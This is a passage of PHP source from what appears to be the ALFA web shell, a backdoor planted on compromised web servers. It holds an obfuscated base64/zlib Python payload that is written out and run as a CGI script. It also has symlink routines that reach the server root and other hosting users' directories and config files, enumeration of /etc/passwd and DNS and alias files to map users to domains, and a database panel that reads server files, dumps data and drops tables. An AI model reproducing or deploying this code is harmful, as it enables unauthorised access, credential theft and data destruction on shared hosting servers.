$py = '#!/usr/bin/python'."\nimport zlib, base64\nalfa_data='".__ALFA_DATA_FOLDER__."'\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
$cginame = "symperl.alfa";
$source = $perl;
$lang = "perl";
if($_POST["alfa2"]=="sympy"){
$cginame = "pysymlink.alfa";
$source = $py;
$lang = "python";
}
@__write_file($cginame,$source);
@chmod($cginame,0755);
echo __pre();
$resource = alfaEx("{$lang} {$cginame} {$sympath}",false,true,true);
if(strlen($resource) == 0){
echo AlfaiFrameCreator('cgialfa/'.$cginame);
}else{
echo $resource;
}
}
if(isset($_POST['alfa4']) && $_POST['alfa4']=='SymFile'){
if(function_exists('symlink')||_alfa_can_runCommand(true,true)){
AlfaNum(9,10);
echo __pre().'
<center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\'symlink\',null,null,null,null,\'SymFile\',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">
<input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />
<input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>
<p><input type="submit" value=" " name="symlink" /></p></form></center>';
$path = $_POST['alfa5'];
$symname = $_POST['alfa6'];
$solevisible58 = $_POST['alfa7'];
if($solevisible58){
$new_name = str_replace(".", "_", basename($symname));
$rand_dir = $new_name.rand(111,9999);
$sym_dir = 'alfasymlinkphp/'.$rand_dir.'/';
@mkdir($sym_dir, 0777, true);
alfacgihtaccess('sym', $sym_dir, $symname);
_alfa_symlink("$path","$sym_dir/$symname");
echo __pre();
echo '<center><b><font color="white">Click >> </font><a target="_blank" href="'.__ALFA_DATA_FOLDER__."/".$sym_dir.'" ><b><font size="4">'.$symname.'</font></b></a></b></center>';
}
}else{echo "<center><pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";}
}
if(isset($_POST['alfa2']) && $_POST['alfa2']=='symphp'){
$cant_symlink = true;
if(function_exists('symlink')||_alfa_can_runCommand(false,false)){
@mkdir('alfasymlink',0777);
alfacgihtaccess('sym','alfasymlink/');
_alfa_symlink('/','alfasymlink/root');
$table_header = "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table id='tbl_sympphp' align='center' width='40%' class='main' border='1'><td><span style='color:#FFFF01;'><b>*</span></b></td><td><span style='color:#00A220;'><b>Domains</span></b></td><td><span style='color:#FFFFFF;'><b>Users</span></b></td><td><span style='color:#FF0000;'><b>symlink</span></b></td>";
if(_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")){
echo "<center>";
$lines = array();
$anony_domains = array();
$anonymous_users = array();
$f_black = array();
$error = false;
$anonymous = false;
$makepwd = "/home/{user}/public_html/";
$domains = alfaGetDomains();
$lines = $domains["lines"];
$state = $domains["state"];
$is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");
$can_runcmd = _alfa_can_runCommand(false,false);
if(!$is_posix && !$can_runcmd){
$anonymous = true;
$anony_domains = $domains["lines"];
$lines = _alfa_file('/etc/passwd');
}
echo $table_header;
$count=1;
$template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="{http}"/><span style="color:#00A220;margin-left:10px;"><b>{domain}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{owner}</font></b></td><td><a href="'.__ALFA_DATA_FOLDER__.'/alfasymlink/root{sympath}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
foreach($lines as $line){
$domain = "";
$owner = "";
if($anonymous){
$explode = explode(":", $line);
$owner = $explode[0];
$owner_len = strlen($owner) - 1;
$userid = $explode[2];
if((int)$userid < 500)continue;
$domain = "[?????]";
$temp_black = array();
$finded = false;
foreach($anony_domains as $anony){
if($state == "named.conf"){
if(@strstr($anony, 'zone')){
preg_match_all('#zone "(.*)"#',$anony, $data);
$domain = $data[1][0];
}else{
continue;
}
}elseif($state == "named" || $state == "valiases"){
if($anony == "." || $anony == "..")continue;
if($state == "named")$anony = rtrim($anony, ".db");
$domain = $anony;
}
$sub_domain = str_replace(array("-","."), "", $domain);
if(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){
if(in_array($owner.$domain, $temp_black))continue;
$sympath = str_replace("{user}", $owner, $makepwd);
$http = "http://".$domain;
echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
$count++;
$temp_black[] = $owner.$domain;
$finded = true;
}
}
if(!$finded){
$anonymous_users[] = $owner;
}
}else{
 if($state == "named.conf"){
if(@strstr($line, 'zone')){
preg_match_all('#zone "(.*)"#',$line, $data);
$domain = $data[1][0];
}else{
continue;
}
}elseif($state == "named" || $state == "valiases"){
if($line == "." || $line == "..")continue;
if($state == "named")$line = rtrim($line, ".db");
$domain = $line;
}
if(strlen(trim($domain)) > 2 && $state != "passwd"){
if(!_alfa_file_exists('/etc/valiases/'.$domain, false))continue;
if($is_posix){
$user = @posix_getpwuid(@fileowner('/etc/valiases/'.$domain));
$owner = $user["name"];
}elseif($can_runcmd){
$owner = alfaEx("stat -c '%U' /etc/valiases/".$domain,false,false);
}
}
}
if(!$anonymous){
if(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue;
$sympath = str_replace("{user}", $owner, $makepwd);
$http = "http://".$domain;
if($state == "passwd"){
$http = "javascript:alert('we cant find domain...')";
}
echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
$count++;
$f_black[] = $owner.$domain;
}
}
if($anonymous){
foreach($anonymous_users as $owner){
$sympath = str_replace("{user}", $owner, $makepwd);
$http = "javascript:alert('we cant find domain...')";
echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);
$count++;
}
}
$cant_symlink = false;
}else{
$is_direct = false;
$makepwd = alfaMakePwd();
if(_alfa_file_exists("/etc/virtual/domainowners")){
$makepwd = "/home/{user}/public_html";
$is_direct = true;
}
$sole = _alfa_file("/etc/virtual/domainowners");
$count=1;
echo $table_header;
$template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="http://www.{url}"/><span style="color:#00A220;margin-left:10px;"><b>{url}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{user}</font></b></td><td><a href="'.__ALFA_DATA_FOLDER__.'/alfasymlink/root{cwd}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
if($sole){
foreach($sole as $visible){
if(@strstr($visible,":")){
$solevisible = explode(':', $visible);
$cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);
echo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);
}
}
}else{
$passwd = _alfa_file("/etc/passwd");
if($passwd){
$html = "";
$is_named = false;
$users = array();
$domains = array();
$uknowns = array();
foreach($passwd as $user){
$user = trim($user);
$expl = explode(":", $user);
if((int)$expl[2] < 500)continue;
$users[$expl[0]] = $expl[5];
}
$site_domains = @scandir("/etc/virtual/");
if(!$site_domains){
$site_domains = alfaEx("ls /etc/virtual/");
$site_domains = explode("\n", $site_domains);
if(!$site_domains){
$site_domains = _alfa_file("/etc/named.conf");
if($site_domains){$is_named = true;}
}
}
foreach($site_domains as $line){
if($is_named){
if(@strstr($line, 'zone')){
preg_match_all('#zone "(.*)"#',$line, $data);
$domain = $data[1][0];
if(strlen($domain  > 2) && !empty($domain)){
$domains[] = $domain;
}
}
}else{
$domains[] = $line;
}
}
$x = 1;
foreach($users as $user => $home){
foreach($domains as $domain){
$user_len = strlen($user) - 1;
$sub_domain = str_replace(array("-","."), "", $domain);
$five_user = substr($user, 0,$user_len);
$five_domain = substr($sub_domain, 0,$user_len);
if($five_user == $five_domain){
if($is_direct){
$cwd = str_replace("{user}", $user, $makepwd);
}else{
$expl = explode("}/", $makepwd);
$cwd = $home."/".$expl[1];
}
$html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);
}else{
$uknowns[$user] = $home;
}
}
}
$uknowns = array_unique($uknowns);
foreach($uknowns as $user => $home){
if($is_direct){
$cwd = str_replace("{user}", $user, $makepwd);
}else{
$expl = explode("}/", $makepwd);
$cwd = $home."/".$expl[1];
}
$html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);
}
echo($html);
}
}
echo "</table>";
$cant_symlink = false;
}
}else{
echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
$cant_symlink = false;
}
if($cant_symlink)echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b><br>';
echo "</center></table>";
}
echo "</div>";
alfafooter();
}
function alfasql(){
class DbClass{
public $type;
public $link;
public $res;
public $mysqli_connect_error = false;
public $mysqli_connect_error_msg = "";
function __construct($type){
$this->type = $type;
}
function connect($host, $user, $pass, $dbname){
switch($this->type){
case 'mysql':
if($this->link = @mysqli_connect($host,$user,$pass,$dbname)){
return true;
}else{
$this->mysqli_connect_error = true;
$this->mysqli_connect_error_msg = mysqli_connect_error();
return false;
}
break;
case 'pgsql':
$host = explode(':', $host);
if(!$host[1]) $host[1]=5432;
if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
break;
}
return false;
}
function selectdb($db){
switch($this->type){
case 'mysql':
if(@mysqli_select_db($db))return true;
break;
}
return false;
}
function query($str){
switch($this->type){
case 'mysql':
return $this->res = @mysqli_query($this->link,$str);
break;
case 'pgsql':
return $this->res = @pg_query($this->link,$str);
break;
}
return false;
}
function fetch(){
$res = func_num_args()?func_get_arg(0):$this->res;
switch($this->type){
case 'mysql':
return @mysqli_fetch_assoc($res);
break;
case 'pgsql':
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs(){
switch($this->type){
case 'mysql':
return $this->query("SHOW databases");
break;
case 'pgsql':
return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
break;
}
return false;
}
function listTables(){
switch($this->type){
case 'mysql':
return $this->res = $this->query('SHOW TABLES');
break;
case 'pgsql':
return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
break;
}
return false;
}
function error(){
switch($this->type){
case 'mysql':
return @mysqli_error($this->link);
break;
case 'pgsql':
return @pg_last_error();
break;
}
return false;
}
function setCharset($str){
switch($this->type){
case 'mysql':
if(function_exists('mysql_set_charset'))
return @mysqli_set_charset($this->link,$str);
else
$this->query('SET CHARSET '.$str);
break;
case 'pgsql':
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
function loadFile($str){
switch($this->type){
case 'mysql':
return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
break;
case 'pgsql':
$this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '".addslashes($str)."';select file from solevisible;");
$r=array();
while($i=$this->fetch())
$r[] = $i['file'];
$this->query('drop table solevisible');
return array('file'=>implode("\n",$r));
break;
}
return false;
}
};
$db = new DbClass($_POST['type']);
alfahead();
$form_visibility = "table";
if(isset($_POST['sql_host'])){
$connection_db = $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
if($connection_db && !empty($_POST['sql_base'])){
$form_visibility = "none";
}
}
$database_list = array();
echo "
<div class='header' style='min-height:300px;'>".($form_visibility!="none"?"<center><div class='txtfont_header'>| Sql Manager |</div><p>".getConfigHtml('all')."</p></center><div style='text-align:center;margin-bottom: 10px;'><button class='connection-his-btn db-opt-id' onclick='alfaShowConnectionHistory(this);' mode='on'>Connection History</button><div class='connection_history_holder'></div></div>":"")."
<div class='sf' class='db-opt-id'><table style='margin: 0 auto;".($form_visibility=="none"?"display:none;":"")."' cellpadding='2' cellspacing='0'><tr>
<td><div class=\"txtfont\">TYPE</div></td><td><div class=\"txtfont\">HOST</div></td><td><div class=\"txtfont\">DB USER</div></td><td><div class=\"txtfont\">DB PASS</div></td><td><div class=\"txtfont\">DB NAME</div></td><td></td></tr><tr>
<td><select name='type'><option value='mysql' selected>mysql</option></select></td>
<td><input type='text' name='sql_host' id='db_host' value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
<td><input type='text' name='sql_login' id='db_user' value='". (empty($_POST['sql_login'])?'':htmlspecialchars($_POST['sql_login'])) ."'></td>
<td><input type='text' name='sql_pass' id='db_pw' value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
$tmp = "<input type='text' name='sql_base' id='db_name' value='". (empty($_POST['sql_base'])?'':htmlspecialchars($_POST['sql_base'])) ."'>";
if(isset($_POST['sql_host'])){
if($connection_db){
$db->setCharset('utf8');
$db->listDbs();
echo "<select name=sql_base><option value=''></option>";
while($item = $db->fetch()) {
list($key, $value) = each($item);
$database_list[] = $value;
echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
}
echo '</select>';
}else{
echo $tmp;
}
}else
echo $tmp;
$curr_mysql_id = $_POST['current_mysql_id'];
echo "</td>
<td><button onclick='fs(this);return false;' class='db-opt-id db-connect-btn'>Connect</button></td>
<td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> <div class=\"txtfont\">count the number of rows</div></td>
</tr>
</table>";
if($db->mysqli_connect_error){
echo '<div style="text-align: center;font-size: 17px;margin-top: 18px;">'.$db->mysqli_connect_error_msg.'</div>';
}
if(!empty($curr_mysql_id)){
$sql_title_db = "";
if(!empty($_POST['sql_base'])){
$sql_title_db = "d.querySelector('#tab_".$curr_mysql_id." span').innerHTML='".addslashes($_POST['sql_base'])."';";
}
echo "<script>mysql_cache['".$curr_mysql_id."']['host']='".addslashes($_POST['sql_host'])."';mysql_cache['".$curr_mysql_id."']['user']='".addslashes($_POST['sql_login'])."';mysql_cache['".$curr_mysql_id."']['pass']='".addslashes($_POST['sql_pass'])."';mysql_cache['".$curr_mysql_id."']['db']='".addslashes($_POST['sql_base'])."';mysql_cache['".$curr_mysql_id."']['charset']='".addslashes($_POST['charset'])."';mysql_cache['".$curr_mysql_id."']['type']='".addslashes($_POST['type'])."';mysql_cache['".$curr_mysql_id."']['count']='".addslashes($_POST['sql_count'])."';".$sql_title_db."alfaConnectionHistoryUpdate();</script>";
}
if(isset($db) && $db->link){
if(!empty($_POST['sql_base'])){
echo "<div class='mysql-main'><div mode='block' onclick='alfaMysqlTablePanelCtl(this);' class='tables-panel-ctl db-opt-id'>&#x3C;&#x3C;</div><div class='mysql-tables'><div><input placeholder=\"Filter Table\" style='padding: 0;margin-left: 11px;text-align:center;' type='text' name='filter_all'><button class='db-opt-id' onclick='alfaMysqlFilterAllTable(this);return false;'>Search</button></div><div class='block'><a sql_count='".(empty($_POST['sql_count'])?"false":"true")."' mode='closed' onclick='alfaMysqlFilterAllTable(this,true);' class='expander parent-expander db-opt-id' href='javascript:void(0);'><img src='http://solevisible.com/icons/menu/b_plus.png' title='Expand/Collapse All DataBases' alt='Expand/Collapse All DataBases'></a></div><ul style='margin-top: 28px;'>";
foreach ($database_list as $db_name) {
echo '<li><div class="block"><i></i><b></b><a sql_count="'.(empty($_POST['sql_count'])?"false":"true").'" db_target="'.$db_name.'" onclick="alfaMysqlExpander(this);" class="expander cls-'.$db_name.'-expander db-opt-id" href="javascript:void(0);"><img src="http://solevisible.com/icons/menu/'.($db_name == $_POST['sql_base']?"b_minus.png":"b_plus.png").'" title="Expand/Collapse" alt="Expand/Collapse"></a></div><span class="db_name">'.$db_name.'</span><div class="clearfloat"></div><div db_name="'.$db_name.'" mode="'.($db_name == $_POST['sql_base']?"loaded":"no").'" class="list_container cls-'.$db_name.'"><div>';
if($db_name == $_POST['sql_base']){
$db->selectdb($_POST['sql_base']);
$tbls_res = $db->listTables();
echo '<ul><li><div class="block"><i></i><b></b></div><div><input style="padding: 0;margin-left: 11px;text-align:center;" type="text" class="db-opt-id" target=".cls-'.$db_name.'" placeholder="Filter Table" onkeyup="alfaMysqlFilterTable(this);" name="filter"></div></li>';
while($item = $db->fetch($tbls_res)){
list($key, $value) = each($item);
if(!empty($_POST['sql_count']))
$n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `'.$value.'`'));
$value = htmlspecialchars($value);
echo "<li><div class='block'><i></i><b></b></div><div class='tables-row'><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a class='db-opt-id' db_target='".$db_name."' href='javascript:void(0);' onclick=\"alfaLoadTableData(this,'".$value."')\"><span class='mysql_tables' style='font-weight:unset;'>".$value."</span></a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small><span style='font-weight:unset;' class='mysql_table_count'>({$n['n']})</span></small>") . "</div></li>";
}
echo '</ul><div style="margin-left: 26px;margin-bottom: 10px;margin-top: 10px;"><input onchange="alfaMysqlTablesEvil(this);" class="db-opt-id" target=".cls-'.$db_name.'" type="checkbox" class="db-opt-id"><select onchange="alfaMysqlTablesDumpDrop(this);" class="db-opt-id" target=".cls-'.$db_name.'" class="db-opt-id" name="tables_evil" style="padding: 0;width: 100px;"><option selected>drop</option><option>dump</option></select> <button onclick="alfaMysqlTablesDumpDropBtn(this);return false;" class="db-opt-id" db_target="'.$db_name.'" target=".cls-'.$db_name.'" class="db-opt-id">Do it</button><div class="dump-file-holder" style="display:none;margin-left:20px;margin-top: 5px;"><input style="padding: 0;text-align:center;" type="text" placeholder="dump.sql" name="dump_file"></div></div>';
}
echo "</div></li>";
}
echo "</ul></div><div class='mysql-query-results'><div class='mysql-query-result-tabs'><div class='db-opt-id mysql-query-selected-tab' target='.mysql-query-result-content' onclick='alfaMysqlTabCtl(this);'>Result</div><div class='db-opt-id' target='.mysql-query-form' onclick='alfaMysqlTabCtl(this);'>Query</div><div class='db-opt-id' target='.mysql-search-area' onclick='alfaMysqlTabCtl(this);'>Search</div><div class='db-opt-id' target='.mysql-structure' onclick='alfaMysqlTabCtl(this);'>Structure</div><div class='db-opt-id' target='.mysql-insert-row' onclick='alfaMysqlTabCtl(this);'>Insert</div><div style='display:none;' class='db-opt-id' target='.mysql-edit-row' onclick='alfaMysqlTabCtl(this);'>Edit</div></div><div class='mysql-query-content mysql-insert-row mysql-hide-content'></div><div class='mysql-query-content mysql-edit-row mysql-hide-content'></div><div class='mysql-query-content mysql-search-area mysql-hide-content'></div><div class='mysql-query-content mysql-structure mysql-hide-content'></div><div class='mysql-query-content mysql-query-form mysql-hide-content'><div style='margin-bottom: 5px;'><span>Query:</span></div><textarea name='query' style='width:90%;height:100px'></textarea><p><div style='float:left;margin-left: 30px;'><input class='button db-opt-id' db_target='".$_POST['sql_base']."' onclick='alfaMysqlQuery(this);return false;' type='submit' value='>>'></div></p></div><div class='mysql-query-content mysql-query-result-content'><div class='mysql-query-result-header'><div style='margin-bottom: 10px;' class='mysql-query-reporter'></div><div class='mysql-query-pager'></div></div><div class='mysql-query-table'></div></div></form></td></tr>";
}
echo "</table></div>";
echo "</div>";
}else{
echo htmlspecialchars($db->error());
}
echo '</div>';
alfafooter();
}
function alfaSql_manager_api(){
$db = $_POST["alfa1"];
$type = $_POST["alfa2"];
$sql_count = $_POST["alfa3"] == "true" ? true : false;
$db = @json_decode($db, true);
$conn = @mysqli_connect($db["host"], $db["user"], $db["pass"], $db["db"]);
@mysqli_set_charset($conn, "utf8");
if($conn){
if($type == "load_all_tables"){
$tables = array();
$q_tables = @mysqli_query($conn, "SELECT `table_schema`, `table_name` FROM `information_schema`.`tables` WHERE `table_schema` IN ('".implode("','", $db["databases"])."');");
$count = 0;
while($row = @mysqli_fetch_assoc($q_tables)){
if($sql_count){
$count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row["table_schema"].'`.`'.$row["table_name"].'`');
if($count_q){
$count = @mysqli_fetch_row($count_q);
$count = $count[0];
}
}
$tables[$row["table_schema"]][] = array("name" => $row["table_name"], "count" => (int)$count);
}
foreach($db["databases"] as $db){
if(!isset($tables[$db])){
$tables[$db] = null;
}
}
echo @json_encode($tables);
}elseif($type == "dump_drop"){
if($db["mode"] == "drop"){
foreach ($db["tables"] as $table) {
@mysqli_query($conn, "DROP TABLE `".$table."`;");
}
$tables = array();
$q_tables = @mysqli_query($conn, "SHOW TABLES;");
$count = 0;
while($row = @mysqli_fetch_array($q_tables)){
if($sql_count){
$count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row[0].'`');
if($count_q){
$count = @mysqli_fetch_row($count_q);
$count = $count[0];
}
}
$tables[] = array("name" => $row[0], "count" => (int)$count);
}
echo @json_encode($tables);
}else{
if(strlen(alfaEx("mysqldump"))>0){
alfaEx("mysqldump --single-transaction --host=\"".$db["host"]."\" --user=\"".$db["user"]."\" --password=\"".$db["pass"]."\" ".$db["db"]." ".implode(" ", $db["tables"])."  > ".$db["dump_file"]);
}else{
$fp = @fopen($db["dump_file"], "w");
foreach ($db["tables"] as $table) {
$res = @mysqli_query($conn, 'SHOW CREATE TABLE `'.$table.'`');
$create = @mysqli_fetch_array($res);
$sql = "DROP TABLE IF EXISTS `".$table."`;\n" . $create[1].";\n";
if($fp) fwrite($fp, $sql); else echo($sql);
$tbl_data = @mysqli_query($conn, 'SELECT * FROM `'.$table.'`');
$head = true;
while($item = @mysqli_fetch_assoc($tbl_data)){
$columns = array();
foreach($item as $k=>$v) {
if($v == null)
$item[$k] = "''";
elseif(is_numeric($v))
$item[$k] = $v;
else
$item[$k] = "'".@mysqli_real_escape_string($conn, $v)."'";
$columns[] = "`".$k."`";
}
if($head) {
$sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
$head = false;
} else
$sql = "\n\t,(".implode(", ", $item).')';
if($fp) fwrite($fp, $sql); else echo($sql);
}
if(!$head)
if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
}
}
echo @json_encode(array("status" => true, "file" => $db["dump_file"]));
}
}elseif($type == "load_tables"){
$tables = array();
$q_tables = @mysqli_query($conn, "SHOW TABLES;");
$count = 0;
while($row = @mysqli_fetch_array($q_tables)){
if($sql_count){
$count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row[0].'`');
if($count_q){
$count = @mysqli_fetch_row($count_q);
$count = $count[0];
}
}
$tables[] = array("name" => $row[0], "count" => (int)$count);
}
echo @json_encode($tables);
}elseif($type == "alter"){
$db["alter"]["type"] = strtolower($db["alter"]["type"]);
$inputs = $db["alter"]["type"]."(".$db["alter"]["input"].")";
$text_input = array("longtext", "text", "mediumtext", "tinytext");
if(in_array($db["alter"]["type"], $text_input)){
$inputs = $db["alter"]["type"];
}
@mysqli_query($conn, "ALTER TABLE `".$db["table"]."` MODIFY COLUMN `".$db["column"]."` " . $inputs);
$error = @mysqli_error($conn);
if($error){
echo $error;
}else{
echo "ok";
}
}elseif($type == "edit" || $type == "delete" || $type == "delete_all"){
if($type == "edit"){
$q = @mysqli_query($conn, "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` WHERE `".$db["col_key"]."` = '".addslashes($db["key"])."' LIMIT 0,1");
$row = @mysqli_fetch_assoc($q);
if($row){
$columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE, DATA_TYPE as type FROM information_schema.columns WHERE `TABLE_SCHEMA` = '".$db["db"]."' AND `TABLE_NAME` = '".$db["table"]."'");
$columns = array();
$edit_data = array();
while($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){
$input = array("col_type" => $row2["COLUMN_TYPE"]);
$row2["type"] = strtolower($row2["type"]);
switch($row2["type"]){
case "longtext": case "text": case "mediumtext": case "tinytext":
$input["tag"] = "textarea";
break;
case "int": case "smallint": case "bigint": case "tinyint": case "mediumint":
$input["tag"] = "input";
$input["type"] = "number";
break;
default:
$input["tag"] = "input";
$input["type"] = "text";
}
$columns[$row2["name"]] = $input;
}
foreach($row as $key => $v){
$edit_data[] = array("col" => $key, "value" => htmlspecialchars($v, ENT_QUOTES, 'UTF-8'), "type" => $columns[$key]);
}
echo @json_encode($edit_data);
}
}else{
if($type == "delete_all"){
$rows = implode("', '", $db["rows"]);
}else{
$rows = addslashes($db["key"]);
}
$query = "DELETE FROM `".$db["db"]."`.`".$db["table"]."` WHERE `".$db["col_key"]."` IN ('".$rows."')";
@mysqli_query($conn, $query);
$error = @mysqli_error($conn);
if($error){
 $status = false;
}else{
